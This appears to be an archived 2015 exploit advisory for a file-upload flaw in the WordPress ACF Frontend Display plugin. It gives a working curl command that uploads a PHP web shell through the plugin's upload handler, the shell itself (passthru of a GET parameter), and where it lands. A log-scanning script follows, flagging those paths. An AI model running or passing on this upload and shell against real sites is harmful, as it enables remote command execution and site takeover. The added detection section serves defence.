
WordPress ACF Frontend Display Shell Upload

Posted on 08 July 2015

+---------------------------------------------------------------------------+
#[+] Author: TUNISIAN CYBER
#[+] Title: WP Plugin Free ACF Frontend Display File Upload Vulnerability
#[+] Date: 3-07-2015
#[+] Type: WebAPP
#[+] Tested on: KaliLinux
#[+] Friendly Sites: sec4ever.com
#[+] Twitter: @TCYB3R
+---------------------------------------------------------------------------+

curl -k -X POST -F "action=upload" -F "files=@/root/Desktop/evil.php" "site:wp-content/plugins/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/server/php/index.php"

File Path:
site/wp-content/uploads/uigen_YEAR/file.php

Example:
site/wp-content/uploads/uigen_2015/evil.php

evil.php:
<?php passthru($_GET['cmd']); ?>

POC:
http://i.imgur.com/7rQClr6.png

TUNISIAN CYBER(miutex)-S4E
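
Detection note (added example, not part of the original advisory): the sketch below scans web server access logs for POSTs to the plugin's bundled upload handler and for requests to script files under uploads/uigen_YEAR/, the two paths named above. The Combined Log Format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re

# Paths taken from the advisory: the plugin's bundled upload handler and the
# uploads/uigen_YEAR/ directory where uploaded files land.
HANDLER = (
    "/wp-content/plugins/acf-frontend-display/js/"
    "blueimp-jQuery-File-Upload-d45deb1/server/php/index.php"
)
# A server-side script extension inside uigen_YEAR/ (extension list is an assumption).
DROP_DIR = re.compile(
    r"/wp-content/uploads/uigen_\d{4}/[^?\s]*\.(?:php\d?|phtml|phar)(?:[/?]|$)", re.I
)
# Combined Log Format: ip - user [time] "METHOD target PROTO" status ...
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

def classify(line):
    """Return (ip, time, label, target) for a suspicious line, else None."""
    m = LINE.match(line)
    if not m:
        return None
    ip, when, method, target, _status = m.groups()
    path = target.split("?", 1)[0]
    # endswith() also covers WordPress installed in a subdirectory.
    if method == "POST" and path.lower().endswith(HANDLER.lower()):
        return (ip, when, "upload-handler-post", target)
    if DROP_DIR.search(target):
        return (ip, when, "script-in-uigen-dir", target)
    return None

def scan(lines):
    """Classify every log line and keep only the hits."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE = [
    '203.0.113.7 - - [03/Jul/2015:10:12:01 +0000] "POST ' + HANDLER
    + ' HTTP/1.1" 200 312 "-" "curl/7.38.0"',
    '203.0.113.7 - - [03/Jul/2015:10:12:09 +0000] "GET '
    '/wp-content/uploads/uigen_2015/evil.php?cmd=id HTTP/1.1" 200 54 "-" "curl/7.38.0"',
    '198.51.100.20 - - [03/Jul/2015:10:13:40 +0000] "GET '
    '/wp-content/uploads/uigen_2015/photo.jpg HTTP/1.1" 200 48213 "-" "Mozilla/5.0"',
    '198.51.100.20 - - [03/Jul/2015:10:14:02 +0000] "GET /wp-login.php HTTP/1.1" 200 2210 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(*hit, sep="  ")
```

Any hit on the second rule means a script file is already reachable in the uploads directory, so it should be triaged before the first.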

 
